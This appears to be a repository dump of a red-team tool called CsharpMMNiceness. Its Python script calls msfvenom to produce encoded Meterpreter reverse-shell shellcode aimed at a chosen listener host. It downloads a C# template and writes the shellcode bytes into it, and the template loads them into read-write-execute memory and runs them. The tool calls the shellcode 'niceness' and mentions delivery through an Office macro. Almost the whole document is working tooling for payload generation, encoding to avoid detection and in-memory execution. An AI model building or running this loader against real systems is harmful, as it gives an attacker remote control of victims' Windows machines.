├── README.md ├── niceness_template.cs └── GenMMNiceness.py /README.md: -------------------------------------------------------------------------------- 1 | # CsharpMMNiceness 2 | Files for generating a C# source file that allows for memory-mapping "niceness" and then executing said "niceness" 3 | -------------------------------------------------------------------------------- /niceness_template.cs: -------------------------------------------------------------------------------- 1 | //////////////////////////// 2 | // 3 | // C# Memory Mapping Template 4 | // Original Template: https://atom0s.com/forums/viewtopic.php?t=178 5 | // Modified By: Brian Fehrman (@fullmetalcache) 6 | // Date Modified: 2018-11-27 7 | // 8 | //////////////////////////// 9 | 10 | //x64 11 | //C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64/out:C:\Users\Public\prog.exe C:\Users\Public\mmniceness.cs 12 | 13 | //x86 14 | //C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /platform:x86 /out:C:\Users\Public\prog.exe C:\Users\Public\mmniceness.cs 15 | 16 | namespace nicenessExample 17 | { 18 | using System; 19 | using System.IO.MemoryMappedFiles; 20 | using System.Runtime.InteropServices; 21 | 22 | class Program 23 | { 24 | private delegate IntPtr GetPebDelegate(); 25 | 26 | private unsafe static IntPtr GetPeb() 27 | { 28 | 29 | const int niceness_length = $$$LENGTH$$$; 30 | MemoryMappedFile mmf = null; 31 | MemoryMappedViewAccessor mmva = null; 32 | 33 | try 34 | { 35 | mmf = MemoryMappedFile.CreateNew("__niceness", niceness_length, MemoryMappedFileAccess.ReadWriteExecute); 36 | 37 | mmva = mmf.CreateViewAccessor(0, niceness_length, MemoryMappedFileAccess.ReadWriteExecute); 38 | 39 | $$$NICENESS$$$ 40 | 41 | var pointer = (byte*)0; 42 | mmva.SafeMemoryMappedViewHandle.AcquirePointer(ref pointer); 43 | 44 | var func = (GetPebDelegate)Marshal.GetDelegateForFunctionPointer(new IntPtr(pointer), typeof(GetPebDelegate)); 45 | 46 | return func(); 47 | } 48 | catch 49 | { 50 | return IntPtr.Zero; 51 | } 52 | finally 53 | { 54 | mmva.Dispose(); 55 | mmf.Dispose(); 56 | } 57 | } 58 | 59 | static void Main(string[] args) 60 | { 61 | var peb = GetPeb(); 62 | Console.WriteLine("PEB is located at: {0:X8}", peb.ToInt32()); 63 | } 64 | } 65 | } 66 | -------------------------------------------------------------------------------- /GenMMNiceness.py: -------------------------------------------------------------------------------- 1 | #example usage: python macropscsgen.py -a x64 -P tcp -l x.x.x.x -p 554 2 | 3 | import argparse 4 | import base64 5 | import subprocess 6 | import urllib2 7 | import random 8 | import string 9 | from itertools import * 10 | 11 | tmpNicenessFile = 'tmpshell.txt' 12 | outputFile = 'mmniceness.cs' 13 | 14 | def grabCSTemplate(): 15 | response = urllib2.urlopen('https://raw.githubusercontent.com/fullmetalcache/CsharpMMNiceness/master/niceness_template.cs') 16 | script = response.read() 17 | 18 | return script 19 | 20 | def injectNiceness(script, nicenessFile, outfile): 21 | 22 | fin = open(nicenessFile) 23 | niceBytes = [] 24 | for line in fin: 25 | line = line.rstrip() 26 | bytes_curr = line.split(", ") 27 | 28 | for byte in bytes_curr: 29 | byte = byte.split(",")[0] 30 | niceBytes.append(byte) 31 | 32 | fout = open(outfile, 'w') 33 | scriptLines = script.split("\n") 34 | 35 | for line in scriptLines: 36 | if '$$$LENGTH$$$' in line: 37 | line = line.replace('$$$LENGTH$$$', "{0};\n".format(len(niceBytes))) 38 | 39 | elif '$$$NICENESS$$$' in line: 40 | line = "" 41 | 42 | idx = 0 43 | for byte in niceBytes: 44 | fout.write("mmva.Write({0}, ((byte){1}));\n".format(idx, byte)) 45 | idx += 1 46 | 47 | fout.write(line + '\n') 48 | 49 | fout.close() 50 | 51 | def createNiceness(arch, protocol, lhost, lport, single, outfile): 52 | msfCall = 'msfvenom' 53 | msfPayload = 'windows/' 54 | encoder = '' 55 | 56 | if arch == 'x64': 57 | msfPayload += 'x64/' 58 | encoder = 'x64/xor' 59 | else: 60 | encoder = 'x86/shikata_ga_nai' 61 | if single == True: 62 | msfPayload += 'meterpreter_reverse_' + protocol 63 | else: 64 | msfPayload += 'meterpreter/reverse_' + protocol 65 | 66 | msfLhost = 'lhost=' + lhost 67 | msfLport = 'lport=' + lport 68 | 69 | msfFormat = "num" 70 | msfOut = outfile 71 | 72 | subprocess.check_output([msfCall, '-p', msfPayload, msfLhost, msfLport, '-f', msfFormat, '-e', encoder, '-i', '5', '-o',msfOut]) 73 | 74 | if __name__== "__main__": 75 | parser = argparse.ArgumentParser(description='Generate Office Macro that writes, compiles, and runs a C# shell code program') 76 | 77 | parser.add_argument('-a', '--arch', choices=['x86', 'x64'], required=True, help='Target Architecture') 78 | parser.add_argument('-P', '--protocol', choices=['http', 'https', 'tcp'], required=True, help='Payload protocol') 79 | parser.add_argument('-l', '--lhost', required=True, help='Listener Host') 80 | parser.add_argument('-p', '--lport', required=True, help='Listener Port') 81 | parser.add_argument('-s', '--single', action='store_true', help='Use a single-stage payload') 82 | args = parser.parse_args() 83 | 84 | createNiceness( args.arch, args.protocol, args.lhost, args.lport, args.single, tmpNicenessFile ) 85 | template = grabCSTemplate() 86 | injectNiceness( template, tmpNicenessFile, outputFile ) 87 | --------------------------------------------------------------------------------